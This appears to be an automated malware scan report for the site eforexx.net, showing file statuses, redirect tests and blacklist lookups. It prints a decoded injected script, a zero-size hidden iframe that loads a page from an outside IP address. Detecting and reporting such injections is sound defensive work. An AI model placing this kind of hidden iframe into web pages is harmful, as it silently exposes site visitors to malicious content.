Scanned pages/files
Request | Server response | Status |
http://eforexx.net/ | 200 OK Content-Length: 34416 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Decoded script: <iframe src="http://176.31.72.96/jdb/inf.php?id=47640a0be5937393c342fa34f09c6e21" width="0" height="0" frameborder="0"></iframe>
Antivirus reports:
http://eforexx.net/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://eforexx.net/templates/eforexx02/script.js | 200 OK Content-Length: 10774 Content-Type: application/javascript | clean |
http://eforexx.net/modules/mod_PlimunNivoSlider/js/jquery-1.6.1.min.js | 200 OK Content-Length: 91342 Content-Type: application/javascript | clean |
http://eforexx.net/modules/mod_PlimunNivoSlider/js/jquery.nivo.slider.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://eforexx.net/test404page.js | 404 Not Found Content-Length: 481 Content-Type: text/html | clean |
http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js | 500 Can't connect to cdn.widgetserver.com:80 (Bad hostname) Content-Length: 172 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: eforexx.net
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 16:25:26 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 16:25:26 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a5703b588b242a389d4a6e74591d03ef=ggp4dvt2gkfv0bqrobmqu1hj76; path=/
X-Powered-By: PHP/5.3.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: eforexx.net
Referer: http://www.google.com/search?q=eforexx.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=eforexx.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://eforexx.net/
Result: eforexx.net is not infected or malware details are not published yet.